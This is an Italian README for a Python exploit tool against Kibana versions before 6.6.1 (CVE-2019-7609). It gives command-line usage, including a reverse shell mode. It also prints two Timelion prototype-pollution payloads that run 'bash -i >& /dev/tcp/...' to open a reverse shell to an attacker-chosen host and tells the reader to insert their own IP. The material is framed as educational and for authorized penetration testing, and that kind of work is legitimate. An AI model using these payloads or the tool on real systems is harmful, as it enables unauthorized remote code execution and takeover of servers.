
Exploit Python 3 per Kibana < 6.6.1 RCE (CVE-2019-7609) tramite prototype pollution, con rilevamento automatico della versione e reverse shell opzionale.
Autore: LandGrey (Refactoring Python3 di [Il Tuo Nome])
Riferimento: Exploit-DB 46651
CVE: CVE-2019-7609
⚠️ Dichiarazione di non responsabilità:
Questo script è solo per scopi educativi e test di penetrazione autorizzati. Non utilizzarlo su sistemi di cui non possiedi o per i quali non hai esplicita autorizzazione. L'autore e i collaboratori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.
Questo è uno script exploit Python 3 per la vulnerabilità di Remote Code Execution nelle versioni di Kibana < 6.6.1. Sfrutta una falla di prototype pollution per eseguire comandi arbitrari, inclusa l'apertura di una reverse shell, su un'istanza vulnerabile di Kibana.
python3 kibana_exploit.py -u http://target-kibana:5601
Per attivare una reverse shell:
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requests librarypackaging libraryInstalla le dipendenze con:
pip install requests packaging
Puoi anche sfruttare questa vulnerabilità manualmente utilizzando il visualizzatore Timelion di Kibana:
Payload di securityMB:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Payload di chybeta:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Sostituisci 192.168.1.100 e 4444 con il tuo IP e porta del listener.
Lo script fornisce un output chiaro e passo-passo per rilevamento, verifica e sfruttamento, rendendolo facile da seguire e divertente da usare!
Questo script è un ottimo modo per imparare sulla prototype pollution, l'esecuzione di codice remoto e le tecniche di penetration testing. Usalo responsabilmente e sempre con permesso!
Questo progetto è solo per uso educativo. Nessuna garanzia, nessuna assicurazione. Hackerare eticamente, rimanere curiosi e divertirsi!